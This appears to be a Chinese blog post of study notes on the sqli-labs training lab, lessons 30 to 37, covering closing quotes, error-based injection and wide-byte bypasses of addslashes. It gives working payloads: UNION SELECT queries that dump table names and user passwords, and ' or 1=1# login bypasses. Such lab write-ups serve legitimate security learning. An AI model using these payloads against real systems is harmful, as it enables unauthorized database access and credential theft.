DAY 6

sqli-labs lesson 30

  • 与上一题一样,需要用到HPP
  • 查看源代码,参数两边加上了双引号,直接使用lesson 26a与lesson 27a的脚本即可

sqli-labs lesson 31

  • 闭合符号为双引号加括号
  • 直接报错型注入

sqli-labs lesson 32(Jsp)

  • 这一题直接用Jsp处理的一个参数即可
  • 闭合符号为单引号与括号,直接报错注入

sqli-labs lesson 32(php)

  • 宽字节注入:https://www.cnblogs.com/xishaonian/p/6063961.html
  • 思路:由源码,这道题过滤单引号,并且形成’这样的字符,所以我们的想法就是把\“吃掉”或者在他前面再加一个\。'的十六进制为0x5c,0x25所以URL编码为%5c%27,可以在前面加一个%df,形成%df%5c%27,也就是输入参数时,提交%df%27,过滤后形成三个字符,这三个字符在SQL中,因为编码设置为GBK,所以前面两个%df%5c会形成一个汉字,这样,%27就独立出来了。
  • 其他的直接使用联合查询语句即可

sqli-labs lesson 33

  • addslashes():

    addslashes() 函数在指定的预定义字符前添加反斜杠。这些字符是单引号(’)、双引号(")、反斜线(\)与NUL(NULL字符)。

  • 和上一题一样

sqli-labs lesson 34

  • 这一关是POST方式
  • 用户名输入:饜’ or 1=1#
  • 其中饜是utf-16位995c的汉字,分成其中5c转换成utf-8就是\,相当于我们在\之前又加了一个\来让他失效了

sqli-labs lesson 35

  • 爆库:?id=99 UNION SELECT 1,database(),3;–+
  • 爆表:?id=99 UNION SELECT 1,group_concat(table_name),3 from information_schema.tables where table_schema=CHAR(115, 101, 99, 117, 114, 105, 116, 121);–+
  • 爆字段:?id=99 UNION SELECT 1,group_concat(column_name),3 from information_schema.columns where table_schema=CHAR(115, 101, 99, 117, 114, 105, 116, 121) and table_name=CHAR(117, 115, 101, 114, 115);–+
  • 爆记录:?id=99 UNION SELECT 1,group_concat(username),group_concat(password) from security.users;–+

sqli-labs lesson 36

  • 宽字节注入,这次用FEFF335c,这是一个有意思的字符,长的这个样子:㍜
  • 检测:?id=99㍜’ UNION SELECT 1,2,3;–+
  • 其他引号用CHAR()函数绕过

sqli-labs lesson 37

  • 和上一题一样,只不过这次是POST
  • 用户名:㍜’ or 1=1;#

最新文章

  1. JavaScript自定义浏览器滚动条兼容IE、 火狐和chrome
  2. ecshop商品子分类点击下拉,子分类空时,直接跳转功能
  3. java打包成jar,但不打包配置文件
  4. 关于无法把程序(Adobe Fireworks CS5)添加到打开方式的解决办法
  5. [BZOJ1856][SCOI2010]字符串(组合数学)
  6. C++ Primer : 第九章 : 顺序容器的定义、迭代器以及赋值与swap
  7. Spring和Struct整合的三个方法
  8. Apache Rewrite 拟静态配置54
  9. 九章算法系列(#4 Dynamic Programming)-课堂笔记
  10. Nginx 配置指令的执行顺序(七)
  11. POJ 2250(最长公共子序列 变形)
  12. FineUIMvc
  13. 让git不再跟踪配置文件的变化
  14. Android Widget小组件开发(一)——Android实现时钟Widget组件的步骤开发,这些知识也是必不可少的!
  15. 使用代码刷QQ的跨年红包
  16. pads layout 自动打地孔
  17. 【Python】Python3纯代码极简教程
  18. 用doxygen自动生成文档
  19. 求最大流dinic算法模板
  20. dev gridview自动列宽和单元、行、checkbox选中和多选

热门文章

  1. Python 2.7和3.6爬取妹子图网站单页测试图片
  2. 清除SQL server 记住的用户名和密码
  3. Java泛型学习一
  4. vmvare安装系统提示vmci.sys 版本不正确解决方法
  5. U盘安装咱中国人自己的操作系统UbuntuKylin14.04LST(超具体原创图文教程)
  6. 第一章:AI人工智能 の 数据预处理编程实战 Numpy, Pandas, Matplotlib, Scikit-Learn
  7. 转载:【架构师之路】依赖注入原理---IoC框架
  8. JS实现图片的淡入和淡出的两种方法,如有不足,还请前辈多多指导^-^~
  9. Ubuntu 18.04安装MongoDB 4.0
  10. Python2.7在Windows下CMD编码为65001/utf-8时print报错[Errno 0]/[Errno 2]